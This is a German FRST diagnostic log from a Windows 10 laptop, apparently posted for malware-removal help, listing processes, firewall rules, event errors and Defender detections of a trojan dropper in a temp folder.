Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
 

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxp://bstbk-vollmachtsdatenbank.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxps://bstbk-vollmachtsdatenbank.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxp://download.datev.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxps://download.datev.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\sharepoint.com -> hxxps://rswm-files.sharepoint.com
 

==================== Hosts Inhalt: =========================
 

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
 

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 

==================== Andere Bereiche ===========================
 

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
 

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\buskr5\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img-20170430-wa0003.jpg

DNS Servers: 192.168.178.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

 ist aktiviert.
 

Network Binding:

=============

Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 

WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 
 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"

HKLM\...\StartupApproved\Run: => "RTHDVCPL"

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\StartupApproved\Run: => "OneDrive"
 

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

FirewallRules: [{166A50AB-BA35-4DC0-94F9-86E3C7612B7F}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{E39623A3-4694-43EA-861D-846DE1BBE081}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{41F20948-57E6-48C0-B787-8E350E0F4AE3}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{9EC5C841-0316-4C4C-8AC6-5D47D1515E43}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{2C47819B-0C76-41E7-8951-FF9884032B29}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{A528EDB2-5B14-4C19-840E-E50161882359}] => (Allow) LPort=5357

FirewallRules: [{35A9C84E-C44A-4EB6-A179-101E53499E5B}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{DF2A37A0-22B5-4F56-BEF2-D55F24A9E8A6}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{6C39964B-8607-462D-BADE-7B852BCE9A96}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{DEC7E16E-33C1-4DE9-A3C5-D9205AEE5645}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{24C9FA9C-13A2-43E7-A79D-703A70335C05}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{65C8E351-555D-4A86-9AB3-CD29636B7DA9}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{E69D8B9E-7CEB-410C-8145-C81E4CCB8E77}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{BC66B58C-B648-4497-889E-7FB43E3E140B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{9CF1E217-96B2-4C50-B89D-32E490BC3A5D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{C0B9ABF0-C6CA-44B7-9DF8-6AE21BACF8B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{EBD4A9EA-A5CF-42F3-999B-FC71F044B516}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [TCP Query User{6A280486-017D-4867-948B-EF1175A2B9A1}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei

FirewallRules: [UDP Query User{3098913F-3817-46A9-B646-AEE9F468614B}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei

FirewallRules: [{24B5A986-5521-4ED0-9467-91D2225031A8}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)

FirewallRules: [{7510E694-223F-4E51-80DD-869688F9BE1F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{5EDC0426-307F-4140-BC21-6F42F1A6D414}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{ACF9D1E2-41C9-4BCA-BFDE-C58E7AEB1799}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{9C443C88-A482-48E0-A390-269EC8292DA5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{C2472821-64AA-418D-B658-F3DC8B7D5DC9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 

==================== Wiederherstellungspunkte =========================
 

21-12-2020 07:06:20 Geplanter Prüfpunkt

28-12-2020 10:50:36 Geplanter Prüfpunkt

06-01-2021 10:37:08 Geplanter Prüfpunkt

09-01-2021 15:44:13 Removed Eumex RNDIS64 Treiber V1.02.
 

==================== Fehlerhafte Geräte im Gerätemanager ============
 

Name: Shrew Soft Virtual Adapter

Description: Shrew Soft Virtual Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Shrew Soft

Service: vnet

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 

==================== Fehlereinträge in der Ereignisanzeige: ========================
 

Applikationsfehler:

==================

Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)

Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
 

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b

Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000

Ausnahmecode: 0xc0000005

Fehleroffset: 0x03233f2e

ID des fehlerhaften Prozesses: 0x285c

Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba

Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Pfad des fehlerhaften Moduls: unknown

Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766

Vollständiger Name des fehlerhaften Pakets: 

Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
 

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 4c0
 

Startzeit: 01d6df75472ad580
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Unknown
 

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 838
 

Startzeit: 01d6df7570957287
 

Beendigungszeit: 24
 

Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
 

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 2ddc
 

Startzeit: 01d6d2c180af7335
 

Beendigungszeit: 4294967295
 

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
 

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949
 

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe
 

Relative Anwendungs-ID des fehlerhaften Pakets: App
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 28f4
 

Startzeit: 01d6d2c07cb57be1
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 

Error: (12/15/2020 09:58:42 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 2608
 

Startzeit: 01d6d2b1bd864c9b
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: b520483e-c602-45e2-8fe9-15a88b5d0f17
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Unknown
 

Error: (12/10/2020 08:09:56 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )

Description: Event-ID 0
 
 

Systemfehler:

=============

Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)

Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
 

Error: (01/09/2021 03:46:20 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXjytc7c0yvwb8n3cw0r82k4364sd1s7bv.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
 

Error: (01/09/2021 03:37:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:36:42 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:36:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 
 

Windows Defender:

===================================

Date: 2021-01-09 18:21:34.8610000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-09 15:47:12.9890000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-09 15:27:32.2830000Z

Description: 

Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.

Überprüfungs-ID: {CD392251-82AD-4230-8B1B-02F5DAAE2DF1}

Überprüfungstyp: Antimalware

Überprüfungsparameter: Schnellüberprüfung

Benutzer: NT-AUTORITÄT\SYSTEM
 

Date: 2021-01-09 15:00:56.0110000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-07 19:07:31.1610000Z

Description: 

Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.

Überprüfungs-ID: {F826CD36-B17A-4994-843F-547ED9BF91B1}

Überprüfungstyp: Antimalware

Überprüfungsparameter: Vollständige Überprüfung

Benutzer: PC5-L\buskr5
 

CodeIntegrity:

===================================
 

Date: 2021-01-09 18:21:31.2260000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 18:21:31.2240000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 18:21:30.9930000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 18:21:30.9910000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 18:20:56.8370000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-09 18:20:56.8330000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-09 18:15:12.0120000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 18:15:12.0100000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

==================== Speicherinformationen =========================== 
 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019

Hauptplatine: FUJITSU FJNBB5C

Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz

Prozentuale Nutzung des RAM: 39%

Installierter physikalischer RAM: 8088.56 MB

Verfügbarer physikalischer RAM: 4883.76 MB

Summe virtueller Speicher: 9368.56 MB

Verfügbarer virtueller Speicher: 6225.64 MB
 

==================== Laufwerke ================================
 

Drive c: () (Fixed) (Total:237.32 GB) (Free:164.91 GB) NTFS
 

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS

\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS

\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 

==================== MBR & Partitionstabelle ====================
 

==========================================================

Disk: 0 (Protective MBR) (Size: 238.5 GB) (Disk ID: 00000000)
 

Partition: GPT.
 

==================== Ende von Addition.txt =======================

Code:

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021

durchgeführt von buskr5 (Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (09-01-2021 18:21:26)

Gestartet von C:\Users\buskr5\Downloads

Geladene Profile: buskr5

Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)

Standard-Browser: Chrome

Start-Modus: Normal
 

==================== Prozesse (Nicht auf der Ausnahmeliste) =================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
 

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe

(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe

(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe

(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe

(FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED) C:\Windows\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe

(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe

(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe

(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\Intel\Intel(R) Management Engine Components\LMS\LMS.exe

(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\jhi_service.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxCUIService.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHDCPSvc.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHeciSvc.exe

(Intel(R) Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe

(Learnpulse -> Learnpulse) C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe

(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe

(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe

(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\iked.exe

(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe

(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
 

==================== Registry (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)

HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)

HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

